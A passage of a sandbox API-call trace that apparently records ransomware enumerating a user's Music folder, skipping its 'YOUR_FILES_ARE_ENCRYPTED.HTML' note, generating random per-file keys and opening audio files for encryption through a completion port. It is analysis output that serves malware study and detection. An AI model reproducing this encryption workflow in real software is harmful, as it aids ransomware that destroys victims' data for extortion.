param_2="%02X" | out: param_1="EF") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="88") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="16") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="41") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="EF") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="54") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="3C") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="2A") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="CD") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="3E") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="96") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="37") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="85") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="EC") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="F6") returned 2 [0167.817] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="45") returned 2 [0167.817] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\bZOq0vO.mp3" [0167.817] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.818] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, 
lpOverlapped=0x74c2008) returned 1 [0167.824] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdda04ec0, ftCreationTime.dwHighDateTime=0x1d7d75d, ftLastAccessTime.dwLowDateTime=0xf65180, ftLastAccessTime.dwHighDateTime=0x1d7d8b2, ftLastWriteTime.dwLowDateTime=0xf65180, ftLastWriteTime.dwHighDateTime=0x1d7d8b2, nFileSizeHigh=0x0, nFileSizeLow=0x144e0, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="JB_KW.m4a", cAlternateFileName="")) returned 1 [0167.824] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a") returned 58 [0167.824] lstrcmpW (lpString1="JB_KW.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.824] PathFindExtensionW (pszPath="JB_KW.m4a") returned=".m4a" [0167.824] lstrlenW (lpString=".m4a") returned 4 [0167.825] PathFindExtensionW (pszPath="JB_KW.m4a") returned=".m4a" [0167.825] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\jb_kw.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x304 [0167.825] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=83168) returned 1 [0167.825] GetProcessHeap () returned 0x270000 [0167.825] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.826] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="07") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="2C") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: 
param_1="CB") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="EC") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="1B") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="E9") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="84") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="A0") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1A") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="06") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4F") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="39") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C2") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="FE") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="8A") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="C1") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B8") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="45") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="53") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="98") returned 2 [0167.826] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="A7") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="44") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="39") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="91") returned 2 [0167.827] wsprintfW (in: 
param_1=0x4ebd78a, param_2="%02X" | out: param_1="CA") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="B0") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="DE") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="2E") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="E3") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="D1") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D0") returned 2 [0167.827] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6E") returned 2 [0167.827] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\JB_KW.m4a" [0167.827] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.827] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.877] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x753c4000, ftCreationTime.dwHighDateTime=0x1d7e531, ftLastAccessTime.dwLowDateTime=0x18b881a0, ftLastAccessTime.dwHighDateTime=0x1d7e60c, ftLastWriteTime.dwLowDateTime=0x18b881a0, ftLastWriteTime.dwHighDateTime=0x1d7e60c, nFileSizeHigh=0x0, nFileSizeLow=0x13a2c, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="L4t6BhMlxA7aY-769Z.mp3", cAlternateFileName="L4T6BH~1.MP3")) returned 1 [0167.878] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3") returned 71 [0167.883] lstrcmpW (lpString1="L4t6BhMlxA7aY-769Z.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.883] PathFindExtensionW (pszPath="L4t6BhMlxA7aY-769Z.mp3") returned=".mp3" [0167.883] lstrlenW (lpString=".mp3") returned 4 [0167.883] PathFindExtensionW (pszPath="L4t6BhMlxA7aY-769Z.mp3") returned=".mp3" [0167.883] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.883] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\l4t6bhmlxa7ay-769z.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.884] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=80428) returned 1 [0167.884] GetProcessHeap () returned 0x270000 [0167.884] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.887] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D4") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="4A") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="42") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="FB") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="D5") returned 2 [0167.887] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="97") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="2F") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="4A") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="63") 
returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="A3") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B5") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="DA") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="57") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="55") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="9D") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="87") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B2") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="AF") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="F5") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="9C") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="AD") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="EA") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="72") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="03") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="7A") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="97") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="51") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="74") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="7A") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="2F") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd7a2, 
param_2="%02X" | out: param_1="E0") returned 2 [0167.888] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="43") returned 2 [0167.889] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\L4t6BhMlxA7aY-769Z.mp3" [0167.889] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.889] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.894] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7af83490, ftCreationTime.dwHighDateTime=0x1d7dbd6, ftLastAccessTime.dwLowDateTime=0xe30ad040, ftLastAccessTime.dwHighDateTime=0x1d7e240, ftLastWriteTime.dwLowDateTime=0xe30ad040, ftLastWriteTime.dwHighDateTime=0x1d7e240, nFileSizeHigh=0x0, nFileSizeLow=0x8d1d, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="OA1ZxZJqdF70.m4a", cAlternateFileName="OA1ZXZ~1.M4A")) returned 1 [0167.895] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a") returned 65 [0167.895] lstrcmpW (lpString1="OA1ZxZJqdF70.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.895] PathFindExtensionW (pszPath="OA1ZxZJqdF70.m4a") returned=".m4a" [0167.895] lstrlenW (lpString=".m4a") returned 4 [0167.895] PathFindExtensionW (pszPath="OA1ZxZJqdF70.m4a") returned=".m4a" [0167.895] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.895] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\oa1zxzjqdf70.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.906] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=36125) returned 1 [0167.906] GetProcessHeap () returned 0x270000 [0167.906] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.910] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="E6") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="AF") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0F") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="27") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="54") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="0E") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="89") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="48") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D8") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="71") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="28") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F0") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C6") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="76") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="6F") returned 2 [0167.910] wsprintfW (in: 
param_1=0x4ebd766, param_2="%02X" | out: param_1="B3") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="B7") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="A9") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="7C") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="22") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="4D") returned 2 [0167.910] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="59") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8A") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="5A") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="0C") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="A1") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="AD") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="91") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="06") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="5B") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E4") returned 2 [0167.911] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="16") returned 2 [0167.911] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\OA1ZxZJqdF70.m4a" [0167.911] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 
0x3a0 [0167.911] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.915] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f682180, ftCreationTime.dwHighDateTime=0x1d7d732, ftLastAccessTime.dwLowDateTime=0x47c1bc0, ftLastAccessTime.dwHighDateTime=0x1d7df27, ftLastWriteTime.dwLowDateTime=0x47c1bc0, ftLastWriteTime.dwHighDateTime=0x1d7df27, nFileSizeHigh=0x0, nFileSizeLow=0x16420, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="oFvRRFIKLRJYqIY4pS.m4a", cAlternateFileName="OFVRRF~1.M4A")) returned 1 [0167.919] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a") returned 71 [0167.919] lstrcmpW (lpString1="oFvRRFIKLRJYqIY4pS.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.919] PathFindExtensionW (pszPath="oFvRRFIKLRJYqIY4pS.m4a") returned=".m4a" [0167.919] lstrlenW (lpString=".m4a") returned 4 [0167.919] PathFindExtensionW (pszPath="oFvRRFIKLRJYqIY4pS.m4a") returned=".m4a" [0167.919] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\ofvrrfiklrjyqiy4ps.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.919] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91168) returned 1 [0167.920] GetProcessHeap () returned 0x270000 [0167.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.920] wsprintfW (in: 
param_1=0x4ebd72a, param_2="%02X" | out: param_1="70") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0B") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="CB") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A1") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="E7") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="3F") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="11") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="DE") returned 2 [0167.920] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="27") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="58") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="4C") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="0A") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F1") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A4") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="24") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="9F") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="41") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5C") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="7A") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="B9") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="12") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="5D") returned 2 
[0167.921] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="22") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="7F") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="15") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="43") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="3B") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="A4") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="DA") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="5B") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="3F") returned 2 [0167.921] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="2C") returned 2 [0167.922] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oFvRRFIKLRJYqIY4pS.m4a" [0167.922] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.922] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.927] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x955fe200, ftCreationTime.dwHighDateTime=0x1d7e1b8, ftLastAccessTime.dwLowDateTime=0xd20cf490, ftLastAccessTime.dwHighDateTime=0x1d7e785, ftLastWriteTime.dwLowDateTime=0xd20cf490, ftLastWriteTime.dwHighDateTime=0x1d7e785, nFileSizeHigh=0x0, nFileSizeLow=0xe459, 
dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="oYzTnBxoMCh.mp3", cAlternateFileName="OYZTNB~1.MP3")) returned 1 [0167.929] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3") returned 64 [0167.929] lstrcmpW (lpString1="oYzTnBxoMCh.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.930] PathFindExtensionW (pszPath="oYzTnBxoMCh.mp3") returned=".mp3" [0167.930] lstrlenW (lpString=".mp3") returned 4 [0167.930] PathFindExtensionW (pszPath="oYzTnBxoMCh.mp3") returned=".mp3" [0167.930] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0167.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\oyztnbxomch.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0167.931] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=58457) returned 1 [0167.931] GetProcessHeap () returned 0x270000 [0167.931] RtlAllocateHeap 